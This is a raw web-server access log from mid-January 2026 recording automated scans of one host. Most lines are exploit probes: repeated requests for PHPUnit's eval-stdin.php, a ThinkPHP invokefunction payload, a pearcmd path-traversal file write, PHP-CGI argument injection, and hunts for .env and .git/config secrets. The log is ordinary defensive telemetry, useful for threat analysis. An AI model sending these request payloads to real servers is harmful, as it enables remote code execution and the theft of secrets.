"/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:23:58 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:23:59 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:23:59 +0000] 404 - GET http 92.249.249.197 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:23:59 +0000] 404 - GET http 92.249.249.197 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:00 +0000] 404 - GET http 92.249.249.197 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:01 +0000] 404 - GET http 92.249.249.197 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:02 +0000] 404 - GET http 92.249.249.197 "/phpunit/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:02 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:03 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:03 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:04 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:05 +0000] 404 - GET http 92.249.249.197 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:05 +0000] 404 - GET http 92.249.249.197 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:05 +0000] 404 - GET http 92.249.249.197 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:06 +0000] 404 - GET http 92.249.249.197 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:06 +0000] 404 - GET http 92.249.249.197 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:06 +0000] 404 - GET http 92.249.249.197 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:07 +0000] 404 - GET http 92.249.249.197 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:07 +0000] 404 - GET http 92.249.249.197 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:07 +0000] 404 - GET http 92.249.249.197 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:07 +0000] 404 - GET http 92.249.249.197 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:08 +0000] 404 - GET http 92.249.249.197 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:08 +0000] 404 - GET http 92.249.249.197 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:08 +0000] 404 - GET http 92.249.249.197 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:09 +0000] 404 - GET http 92.249.249.197 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:09 +0000] 404 - GET http 92.249.249.197 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:09 +0000] 404 - GET http 92.249.249.197 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:09 +0000] 404 - GET http 92.249.249.197 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:10 +0000] 404 - GET http 92.249.249.197 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:10 +0000] 404 - GET http 92.249.249.197 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:10 +0000] 404 - GET http 92.249.249.197 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:11 +0000] 404 - GET http 92.249.249.197 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:11 +0000] 404 - GET http 92.249.249.197 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:12 +0000] 404 - GET http 92.249.249.197 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:12 +0000] 404 - GET http 92.249.249.197 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:12 +0000] 404 - GET http 92.249.249.197 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:13 +0000] 403 - GET http 92.249.249.197 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:13 +0000] 403 - GET http 92.249.249.197 "/index.php?lang=../../../../../../../../tmp/index1" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:24:13 +0000] 404 - GET http 92.249.249.197 "/containers/json" [Client 42.240.131.227] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:04:26:04 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:04:26:56 +0000] 404 - GET http 92.249.249.197 "/bins/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[13/Jan/2026:04:43:27 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; FreeBSD amd64; rv:48.0) Gecko/20100101 Firefox/48.0" "-" +[13/Jan/2026:04:43:27 +0000] 404 - GET http 92.249.249.197 "/api/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 5.1.1; SM-J120FN Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 YaBrowser/18.1.2.69.00 (beta) Mobile Safari/537.36" "-" +[13/Jan/2026:04:43:27 +0000] 404 - GET http 92.249.249.197 "/backend/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1" "-" +[13/Jan/2026:04:43:27 +0000] 404 - GET http 92.249.249.197 "/admin/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0" "-" +[13/Jan/2026:04:43:28 +0000] 404 - GET http 92.249.249.197 "/.env.example" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 7.1.2; AFTMM Build/NS6264; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/59.0.3071.125 Mobile Safari/537.36" "-" +[13/Jan/2026:04:43:28 +0000] 404 - GET http 92.249.249.197 "/app_dev.php/_profiler/phpinfo" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0" "-" +[13/Jan/2026:04:43:28 +0000] 200 - GET http 92.249.249.197 "/?phpinfo=-1" [Client 78.153.140.177] [Length 1033] [Gzip -] "Mozilla/5.0 (Linux; Android 7.1.1; G8232 Build/41.2.A.7.8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36" "-" +[13/Jan/2026:04:43:28 +0000] 404 - GET http 92.249.249.197 "/docker.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.4.2; de-de; GT-P5200 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[13/Jan/2026:04:43:28 +0000] 404 - GET http 92.249.249.197 "/icon/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; USCCADR6325US Carrier ID 45 Build/GRJ22) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[13/Jan/2026:04:43:29 +0000] 404 - GET http 92.249.249.197 "/local/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Callpod Keeper for Android 1.0 (10.0.1/235) Dalvik/2.1.0 (Linux; U; Android 5.0.1; SM-N915V Build/LRX22C)" "-" +[13/Jan/2026:04:43:29 +0000] 404 - GET http 92.249.249.197 "/.docker/laravel/app/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:29.0) Gecko/20100101 Firefox/29.0" "-" +[13/Jan/2026:04:43:29 +0000] 404 - GET http 92.249.249.197 "/login/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5" "-" +[13/Jan/2026:04:43:29 +0000] 404 - GET http 92.249.249.197 "/engine/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.0; es-ES; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11" "-" +[13/Jan/2026:04:43:32 +0000] 404 - GET http 92.249.249.197 "/.env_old" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.122 Safari/537.36 OPR/24.0.1558.64" "-" +[13/Jan/2026:04:43:33 +0000] 404 - GET http 92.249.249.197 "/export/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.65 Safari/537.36" "-" +[13/Jan/2026:04:43:33 +0000] 404 - GET http 92.249.249.197 "/.env.staging" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.3; en-us; Desire HD Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[13/Jan/2026:04:43:33 +0000] 404 - GET http 92.249.249.197 "/v3/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.8.1.11) Gecko/20071201 Firefox/2.0.0.11" "-" +[13/Jan/2026:04:43:34 +0000] 404 - GET http 92.249.249.197 "/libs/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (webOS/1.4.5.1; U; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Version/1.0 Safari/532.2 Pixi/1.1" "-" +[13/Jan/2026:04:43:34 +0000] 404 - GET http 92.249.249.197 "/linux/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/9.61 (Windows NT 5.1; U; de) Presto/2.1.1" "-" +[13/Jan/2026:04:43:34 +0000] 404 - GET http 92.249.249.197 "/.env.docker" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; Moto G (5) Plus Build/NPN25.137-83) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36 OPR/43.0.2246.121183" "-" +[13/Jan/2026:04:43:34 +0000] 404 - GET http 92.249.249.197 "/api/v2/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-J500M Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36" "-" +[13/Jan/2026:04:43:35 +0000] 404 - GET http 92.249.249.197 "/.env.prod.local" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/9.22 (Windows NT 6.0; U; en)" "-" +[13/Jan/2026:04:43:55 +0000] 404 - GET http 92.249.249.197 "/site/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" "-" +[13/Jan/2026:04:44:09 +0000] 404 - GET http 92.249.249.197 "/dependencies/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 OPR/44.0.2510.1449" "-" +[13/Jan/2026:04:44:14 +0000] 404 - GET http 92.249.249.197 "/sandbox/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36 OPR/15.0.1147.148" "-" +[13/Jan/2026:04:44:25 +0000] 404 - GET http 92.249.249.197 "/contact/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/538.1 (KHTML, like Gecko) Otter/0.1.01 Safari/538.1" "-" +[13/Jan/2026:04:44:41 +0000] 404 - GET http 92.249.249.197 "/build/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android-4.0.3; en-us; Xoom Build/IML77) AppleWebKit/535.7 (KHTML, like Gecko) CrMo/16.0.912.75 Safari/535.7" "-" +[13/Jan/2026:04:44:42 +0000] 404 - GET http 92.249.249.197 "/bot/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.6; en-gb; GT-S5690 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[13/Jan/2026:04:44:43 +0000] 404 - GET http 92.249.249.197 "/office/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia5700/3.27; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413" "-" +[13/Jan/2026:04:44:44 +0000] 404 - GET http 92.249.249.197 "/repo/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.1.2 Safari" "-" +[13/Jan/2026:04:45:51 +0000] 200 - GET http 92.249.249.197 "/" [Client 199.45.155.93] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[13/Jan/2026:04:45:54 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.93] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:04:45:55 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[13/Jan/2026:04:45:55 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.93] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:04:46:02 +0000] 404 - GET http 92.249.249.197 "/sitemap.xml" [Client 199.45.155.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[13/Jan/2026:04:46:05 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.93] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:04:50:57 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:05:08:22 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:05:12:17 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:05:12:54 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 198.235.24.93] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[13/Jan/2026:05:20:38 +0000] 200 - GET http 92.249.249.197 "/" [Client 3.143.33.63] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[13/Jan/2026:05:21:17 +0000] 200 - GET http 92.249.249.197 "/" [Client 3.143.33.63] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[13/Jan/2026:05:21:21 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.143.33.63] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:05:21:36 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.143.33.63] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:05:24:43 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.143.33.63] [Length 0] [Gzip -] "-" "-" +[13/Jan/2026:05:36:06 +0000] 200 - GET http 92.249.249.197 "/" [Client 91.224.92.14] [Length 1033] [Gzip -] "-" "-" +[13/Jan/2026:05:37:49 +0000] 404 - GET http localhost-nginx-proxy-manager "/boaform/admin/formLogin?username=user&psd=user" [Client 60.23.232.39] [Length 150] [Gzip -] "-" "-" +[13/Jan/2026:05:38:21 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:05:43:15 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.93.251.137] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:05:44:12 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:05:50:19 +0000] 200 - GET http 92.249.249.197 "/" [Client 207.154.228.110] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0" "-" +[13/Jan/2026:06:03:18 +0000] 404 - GET http 92.249.249.197 "/.git/config" [Client 195.178.110.246] [Length 122] [Gzip 1.35] "Mozilla/5.0 (OS/2; Warp 4.5; rv:24.0) Gecko/20100101 Firefox/24.0" "-" +[13/Jan/2026:06:03:43 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:06:05:14 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:06:08:56 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 193.142.147.209] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:06:08:56 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[13/Jan/2026:06:24:15 +0000] 404 - GET http 92.249.249.197 "/cgi/conf.bin" [Client 194.50.16.253] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11" "http://92.249.249.197:80/mainFrame.htm" +[13/Jan/2026:06:30:51 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:06:40:02 +0000] 200 - GET http 92.249.249.197 "/" [Client 45.156.129.54] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[13/Jan/2026:06:40:49 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.93.251.137] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:06:44:06 +0000] 404 - GET http 92.249.249.197 "/robots.txt" [Client 91.232.238.106] [Length 150] [Gzip -] "xfa1" "-" +[13/Jan/2026:06:54:40 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:06:55:27 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:07:06:16 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 118.26.111.61] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:07:06:16 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 118.26.111.61] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:07:06:17 +0000] 404 - POST http 92.249.249.197 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:17 +0000] 405 - POST http 92.249.249.197 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 118.26.111.61] [Length 154] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:18 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:18 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:19 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:19 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:19 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:20 +0000] 404 - GET http 92.249.249.197 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:20 +0000] 404 - GET http 92.249.249.197 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:21 +0000] 404 - GET http 92.249.249.197 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:21 +0000] 404 - GET http 92.249.249.197 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:22 +0000] 404 - GET http 92.249.249.197 "/phpunit/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:22 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:23 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:23 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:23 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:24 +0000] 404 - GET http 92.249.249.197 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:24 +0000] 404 - GET http 92.249.249.197 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.26.111.61] [Length 150] [Gzip -] "libredtail-http" "-" +[13/Jan/2026:07:06:25 +0000] 404 - GET http 